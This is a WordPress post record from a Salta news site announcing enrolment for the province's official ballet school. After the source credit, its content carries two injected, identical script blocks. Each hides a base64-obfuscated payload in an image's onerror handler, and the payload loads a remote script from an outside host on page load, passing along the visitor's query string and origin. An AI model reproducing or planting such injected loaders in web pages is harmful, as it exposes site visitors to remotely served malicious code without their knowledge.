{"id":4392,"date":"2024-09-09T11:20:43","date_gmt":"2024-09-09T14:20:43","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4392"},"modified":"2025-08-13T23:49:00","modified_gmt":"2025-08-14T02:49:00","slug":"abren-las-inscripciones-para-formar-parte-de-la-escuela-oficial-de-ballet-de-la-provincia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4392","title":{"rendered":"Abren las inscripciones para formar parte de la Escuela Oficial de Ballet de la Provincia"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-28f684048568b1f49c09c40b41aba137\" style=\"background-color:#950c4e\"><em>La Secretar\u00eda de Cultura de la Provincia de Salta anunci\u00f3 la apertura de inscripciones para formar parte de la Escuela Oficial de Ballet (EOB) durante el a\u00f1o lectivo 2025. Los interesados podr\u00e1n inscribirse virtualmente en septiembre y presencialmente en octubre.<\/em><\/h4>\n\n\n\n<p>La Secretar\u00eda de Cultura, a trav\u00e9s de la Escuela Oficial de Ballet de la Provincia (EOB), abre la convocatoria para ni\u00f1as, ni\u00f1os y j\u00f3venes que deseen iniciar o continuar su formaci\u00f3n en ballet cl\u00e1sico. Esta prestigiosa instituci\u00f3n, que imparte ense\u00f1anza gratuita bajo la responsabilidad del Estado, se dedica a la formaci\u00f3n integral de bailarines y bailarinas, combinando teor\u00eda y pr\u00e1ctica. Creada oficialmente en 2015 y funcionando desde marzo de 2016, la escuela tiene su sede en el Centro Cultural Am\u00e9rica, ubicado en Mitre 23, subsuelo, frente a la Plaza 9 de Julio.<\/p>\n\n\n\n<p>La carrera en la EOB tiene una duraci\u00f3n de 8 a\u00f1os y proporciona a los estudiantes una formaci\u00f3n profesional completa en ballet, permiti\u00e9ndoles, al egresar, integrarse a una compa\u00f1\u00eda de ballet o desempe\u00f1arse en diversas disciplinas del movimiento.<\/p>\n\n\n\n<p>Las inscripciones se realizar\u00e1n en dos modalidades: durante todo el mes de septiembre mediante formulario web, y del 7 al 25 de octubre de forma presencial en las instalaciones de la escuela, de lunes a viernes de 9 a 11:30 hs. La edad de los postulantes se computa al mes de marzo de 2025.<\/p>\n\n\n\n<p>La convocatoria est\u00e1 dirigida a ni\u00f1as y ni\u00f1os de entre 8 y 12 a\u00f1os, quienes no necesitan tener experiencia previa; mujeres a partir de 13 a\u00f1os, con un m\u00ednimo de 5 a\u00f1os de experiencia en ballet cl\u00e1sico y buen manejo de puntas; y varones de entre 13 y 21 a\u00f1os, con conocimientos en cualquier disciplina del movimiento.<\/p>\n\n\n\n<p>La selecci\u00f3n final se realizar\u00e1 el viernes 1 de noviembre a las 9 de la ma\u00f1ana. Para m\u00e1s informaci\u00f3n, consultar en&nbsp;<a href=\"http:\/\/www.culturasalta.gob.ar\/\">http:\/\/www.culturasalta.gob.ar<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Secretar\u00eda de Cultura de la Provincia de Salta anunci\u00f3 la apertura de inscripciones para formar parte de la Escuela Oficial de Ballet (EOB) durante el a\u00f1o lectivo 2025. Los interesados podr\u00e1n inscribirse virtualmente en septiembre y presencialmente en octubre. La Secretar\u00eda de Cultura, a trav\u00e9s de la Escuela Oficial de Ballet de la Provincia [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4393,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,15],"tags":[],"class_list":{"0":"post-4392","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4392"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4392"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4392\/revisions"}],"predecessor-version":[{"id":6687,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4392\/revisions\/6687"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4393"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4392"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4392"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4392"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}